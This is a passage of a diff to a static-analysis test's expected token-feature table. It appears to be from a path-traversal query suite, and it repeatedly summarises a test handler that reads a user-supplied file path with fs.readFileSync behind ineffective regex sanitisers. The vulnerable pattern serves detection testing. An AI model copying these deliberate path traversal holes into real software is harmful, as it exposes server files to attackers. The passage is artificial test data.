autogenerated/TaintedPath/TaintedPath.js:183:14:183:55 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:55 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:55 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:55 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:55 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:183:14:183:55 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:183:14:183:55 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:183:14:183:55 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6372,6 +64920,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:183:14:183:55 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:183:14:183:55 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:183:14:183:55 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:183:17:183:28 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:17:183:28 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:17:183:28 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:17:183:28 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:17:183:28 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:33 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:33 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:33 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:33 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:33 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:41 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:41 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:41 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:41 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:41 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:54 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:54 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:54 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:54 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:30:183:54 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:183:30:183:54 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:183:30:183:54 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:183:30:183:54 | path.re ... /g, '') | calleeImports | fs | @@ -6381,6 +64949,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:183:30:183:54 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:183:30:183:54 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:183:30:183:54 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:183:35:183:41 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:35:183:41 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:35:183:41 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:35:183:41 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:35:183:41 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:183:43:183:49 | /[..]/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:183:43:183:49 | /[..]/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:183:43:183:49 | /[..]/g | calleeImports | url | @@ -6399,6 +64972,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:183:52:183:53 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:183:52:183:53 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:183:52:183:53 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:7 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:7 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:7 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:7 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:13 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:13 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:13 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:13 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:13 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:55 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:55 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:55 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:55 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:55 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:55 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:55 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:55 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:55 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:5:184:55 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:184:9:184:13 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:9:184:13 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:9:184:13 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:9:184:13 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:9:184:13 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:16 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:16 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:16 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:16 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:16 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:29 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:29 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:29 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:29 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:29 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:54 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:54 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:54 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:54 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:15:184:54 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:184:15:184:54 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:184:15:184:54 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:184:15:184:54 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6407,6 +65020,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:184:15:184:54 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:184:15:184:54 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:184:15:184:54 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:184:18:184:29 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:18:184:29 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:18:184:29 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:184:18:184:29 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:184:18:184:29 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:34 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:184:31:184:34 | path | contextSurroundingFunctionParameters | (req, res) | +| 